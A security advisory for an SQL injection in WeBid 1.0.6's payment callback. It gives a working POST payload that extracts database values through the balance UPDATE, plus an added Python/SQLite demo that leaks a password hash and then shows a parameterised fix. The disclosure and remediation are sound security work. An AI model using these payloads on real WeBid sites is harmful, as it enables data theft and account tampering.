Title: WeBid 1.0.6 SQL Injection Vulnerability
Author: Life Wasted
Vendor: http://www.webidsupport.com/
Affected versions: 1.0.6 (tested); other versions may also be affected
Tested on: Linux, Windows

Vulnerable code:
  Line 53 of validate.php
  Lines 198 through 202 and line 234 of includes/functions_fees.php

Proof of concept:

validate.php?toocheckout=asdf calls the toocheckout_validate() function.
toocheckout_validate() takes unsanitized POST input from two parameters (total and cart_order_id).
toocheckout_validate() calls callback_process() if the POST parameter credit_card_processed is equal to 'Y'.
The unsanitized parameters are used in an UPDATE query:

  $query = "UPDATE " . $DBPrefix . "users SET balance = balance + " . $payment_amount . $addquery . " WHERE id = " . $custom_id;

Because the attacker controls both $payment_amount and $custom_id, data can be retrieved with a time-based blind injection technique, or by overwriting a pre-existing column value with the output of an embedded subquery.

For example, the attacker could send the following POST data to extract the name of the current database:

  URL: http://www.2cto.com/validate.php?toocheckout=asdf
  POST data: cart_order_id=*Attacker's user ID*WEBID1&credit_card_processed=Y&total=1, name=(SELECT database())

The resulting query would be:

  UPDATE users SET balance = balance + 1, name=(SELECT database()) WHERE id = *Attacker's user ID*

The attacker can then sign in to their own account and read the extracted value on the edit_data.php page.
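The following is an added example, not code from the advisory or from WeBid: a Python/SQLite model of the balance UPDATE above, showing how the concatenated `total` value turns the query into a data-extraction primitive and how type coercion plus bound parameters closes the hole. The `users` table, its rows and the `custom_id_from_cart_order_id` helper are constructed assumptions (the advisory only shows that the user id is taken from the text before `WEBID`); SQLite has no `database()`, so the subquery pulls another user's password hash instead, which is the same "overwrite a column with a subquery result" technique.

```python
import sqlite3

# Constructed stand-in for the WeBid users table (assumption: real schema differs).
# The attacker is user id 2; the admin row is what the subquery will leak.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT, balance REAL);
INSERT INTO users VALUES (1, 'admin',    'admin-password-hash', 0);
INSERT INTO users VALUES (2, 'attacker', 'attacker-hash',       0);
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def custom_id_from_cart_order_id(cart_order_id):
    # Assumption: the user id is whatever precedes the WEBID marker,
    # matching the advisory's "*Attacker's user ID*WEBID1" payload.
    return cart_order_id.split("WEBID", 1)[0]


def vulnerable_balance_update(conn, total, cart_order_id):
    # Models the query in includes/functions_fees.php: POST values are
    # concatenated straight into the UPDATE, so 'total' can append extra
    # SET clauses and the id taken from cart_order_id can rewrite WHERE.
    payment_amount = total
    custom_id = custom_id_from_cart_order_id(cart_order_id)
    query = ("UPDATE users SET balance = balance + " + payment_amount
             + " WHERE id = " + custom_id)
    conn.execute(query)
    conn.commit()
    return query


def hardened_balance_update(conn, total, cart_order_id):
    # Fix: coerce to the expected types (anything that is not a number
    # raises ValueError) and bind with placeholders so the values are
    # never parsed as SQL.
    payment_amount = float(total)
    custom_id = int(custom_id_from_cart_order_id(cart_order_id))
    conn.execute("UPDATE users SET balance = balance + ? WHERE id = ?",
                 (payment_amount, custom_id))
    conn.commit()


def get_name(conn, user_id):
    return conn.execute("SELECT name FROM users WHERE id = ?",
                        (user_id,)).fetchone()[0]


def get_balance(conn, user_id):
    return conn.execute("SELECT balance FROM users WHERE id = ?",
                        (user_id,)).fetchone()[0]


def run_exploit(conn):
    # Attacker (id 2) overwrites their own 'name' with a subquery result,
    # then reads it back from their profile, as on edit_data.php.
    total = "1, name=(SELECT password FROM users WHERE id = 1)"
    cart_order_id = "2WEBID1"
    vulnerable_balance_update(conn, total, cart_order_id)
    return get_name(conn, 2)


def hardened_rejects_payload(conn):
    # Same payload against the fixed query: float() refuses it before
    # any SQL runs, so nothing is modified.
    try:
        hardened_balance_update(
            conn, "1, name=(SELECT password FROM users WHERE id = 1)", "2WEBID1")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable query:", run_exploit(db))
    print("hardened query rejects payload:", hardened_rejects_payload(make_db()))
```

Casting alone would stop this particular payload, but the binding is what matters: it keeps the query shape fixed no matter what the POST body contains, which also removes the time-based blind vector the advisory mentions.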